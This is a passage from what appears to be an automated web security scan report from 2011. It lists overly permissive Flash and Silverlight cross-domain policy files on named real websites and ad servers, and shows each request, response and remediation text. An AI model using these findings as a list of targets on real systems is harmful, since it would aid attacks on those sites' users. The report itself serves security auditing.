   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

7.139. http://www.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:50:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Sun, 04 Sep 2011 11:50:51 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- Begin FetchBack Cross Domain Policy Entry -->
<allow-access-from domain="*.fetchback.com" to-ports="80" />
...[SNIP]...

7.140. http://www.godaddy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 04:31:28 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

7.141. http://www.jdoqocy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jdoqocy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jdoqocy.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 04 Sep 2011 04:39:39 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

7.142. http://www.mid-day.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mid-day.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mid-day.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:40:21 GMT
Server: Apache
Last-Modified: Wed, 09 Feb 2011 16:11:54 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/xml
Content-Length: 209
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.cooliris.com" /></cross-domain-
...[SNIP]...

7.143. http://www.nationmultimedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nationmultimedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 16 Dec 2010 09:18:31 GMT
ETag: "1a87bde-d3-898be7c0"
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" />
</cross-dom
...[SNIP]...

7.144. http://www.npr.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:08 GMT
Server: Apache/2.2.14 (Unix)
Last-Modified: Thu, 07 Apr 2011 20:17:23 GMT
ETag: "1c7-4a059cc14c23e"
Accept-Ranges: bytes
Content-Length: 455
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 04:54:08 GMT
Keep-Alive: timeout=10, max=4977
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.threespot.com"/>
   <allow-access-from domain="*.npr.org" />
   <allow-access-from domain="*.digitaria.com"/>
   <allow-access-from domain="www.kqed.org" />
   <allow-access-from domain="*.iheartnpr.org" />
   <allow-access-from domain="apps.facebook.com" />
...[SNIP]...

7.145. http://www.ticketmaster.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-els1
Vary: Cookie
Last-Modified: Tue, 09 Aug 2011 19:57:34 GMT
ETag: "4c3-f9842780"
Accept-Ranges: bytes
Content-Length: 1219
Content-Type: text/xml
Date: Sun, 04 Sep 2011 04:44:29 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ticketmaster.co.nz" />
<allow-access-from domain="*.ticketmaster.co.uk" />
<allow-access-from domain="*.ticketmaster.com" />
<allow-access-from domain="*.ticketmaster.com.au" />
<allow-access-from domain="*.ticketmaster.com.mx" />
<allow-access-from domain="*.ticketmaster.de" />
<allow-access-from domain="*.ticketmaster.ie" />
<allow-access-from domain="*.ticketmaster.es" />
<allow-access-from domain="*.ticketmaster.eu" />
<allow-access-from domain="*.ticketmaster.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmcs" secure="false" />
...[SNIP]...
<allow-access-from domain="ticketmaster.com" />
...[SNIP]...
<allow-access-from domain="ticketmaster.de" />
<allow-access-from domain="ticketmaster.ie" />
<allow-access-from domain="ticketmaster.es" />
<allow-access-from domain="ticketmaster.eu" />
...[SNIP]...

7.146. http://www.wtp101.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtp101.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:03:55 GMT
ETag: 1300113893320
LastModified: Mon, 14 Mar 2011 14:44:53 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

7.147. http://www.youtube-nocookie.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube-nocookie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube-nocookie.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 11:00:11 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:13 GMT
ETag: "132-4abe552de3f40"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

7.148. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Sun, 04 Sep 2011 04:45:38 GMT
Expires: Sun, 04 Sep 2011 04:45:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

7.149. http://www.zigwheels.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zigwheels.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zigwheels.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:45:15 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.25 PHP/5.3.1
Last-Modified: Thu, 16 Dec 2010 12:47:43 GMT
ETag: "add747-1c2-4978675b439c0"
Accept-Ranges: bytes
Content-Length: 450
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="indiatimes.com"/>
<allow-access-from domain="*.indiatimes.com"/>
<allow-access-from domain="timesofindia.indiatimes.com"/>
<allow-access-from domain="flash.indiatimes.com"/>
<allow-access-from domain="economictimes.indiatimes.com"/>
...[SNIP]...

7.150. http://www2.panasonic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www2.panasonic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.panasonic.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:40:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 11 Nov 2010 21:05:47 GMT
ETag: "20a9-ac-567bc0c0"
Accept-Ranges: bytes
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://www3stage.panasonic.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.panasonic.com" />
</cross-domain-policy>

7.151. http://ads3.bangkokpost.co.th/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads3.bangkokpost.co.th
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads3.bangkokpost.co.th

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:05 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.13
Last-Modified: Thu, 05 Aug 2010 08:33:07 GMT
ETag: "67000000005a69-141-48d0f664f2fef"
Accept-Ranges: bytes
Content-Length: 321
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 02:25:05 GMT
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="bangkokpost.co.th" />

...[SNIP]...
<allow-access-from domain="posttoday.com" />
...[SNIP]...

7.152. http://cricket.widgets.stats.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cricket.widgets.stats.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cricket.widgets.stats.com

Response

HTTP/1.0 200 OK
Content-Length: 596
Content-Type: text/xml
Last-Modified: Mon, 08 Aug 2011 05:36:30 GMT
Accept-Ranges: bytes
ETag: "f69223208d55cc1:a05"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:43:49 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="demo.sportzinteractive.net"/>
<allow-access-from domain="www.castrolcricket.com"/>
<allow-access-from domain="stage.sports.ndtv.com"/>
<allow-access-from domain="sports.ndtv.com"/>
<allow-access-from domain="sportz.ndtv.com"/>
<allow-access-from domain="castrol.cricket.sportzdeck.stats.com"/>
<allow-access-from domain="imads.rediff.com"/>
...[SNIP]...
<allow-access-from domain="cricket.sportzdeck.stats.com"/>
...[SNIP]...

7.153. https://docs.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 04:20:53 GMT
Date: Sat, 03 Sep 2011 04:20:53 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 86046

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

7.154. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-rbc.bidder7.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:05 GMT
ETag: "41580e4-116-4ab73f1504140"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

7.155. http://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:37 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 04:51:37 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7.156. https://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:56 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 04:51:56 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7.157. http://weblink.settrade.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblink.settrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: weblink.settrade.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:16 GMT
Server: Unknown
Last-Modified: Tue, 18 Jul 2006 12:31:30 GMT
ETag: "1f4649-3f1-418da5384ec80"
Accept-Ranges: bytes
Content-Length: 1009
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www1.settrade.com" secure="false" />
<allow-access-from domain="wwwa1.settrade.com" secure="false" />
<allow-access-from domain="wwwa2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwa3.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwb3.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwc1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwc2.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwd1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwe1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwf1.settrade.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.phatradirect.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www2.phatradirect.com" secure="false" />
...[SNIP]...

8. Silverlight cross-domain policy  previous  next
There are 26 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


8.1. http://33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: 33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:01:25 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 17:37:23 GMT
Accept-Ranges: bytes
Content-Length: 335
Cache-Control: max-age=1209600, proxy-revalidate
Expires: Sun, 18 Sep 2011 11:01:25 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

8.2. http://ad-apac.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sun, 04 Sep 2011 04:04:44 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.3. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sun, 04 Sep 2011 04:05:51 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.4. http://ad4.liverail.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad4.liverail.com

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Accept-Ranges: bytes
ETag: "729570719"
Last-Modified: Thu, 01 Sep 2011 20:21:26 GMT
Content-Length: 321
Connection: close
Date: Sun, 04 Sep 2011 02:41:41 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

8.5. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 02:33:40 GMT
Date: Sun, 04 Sep 2011 02:33:40 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.6. http://clk.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

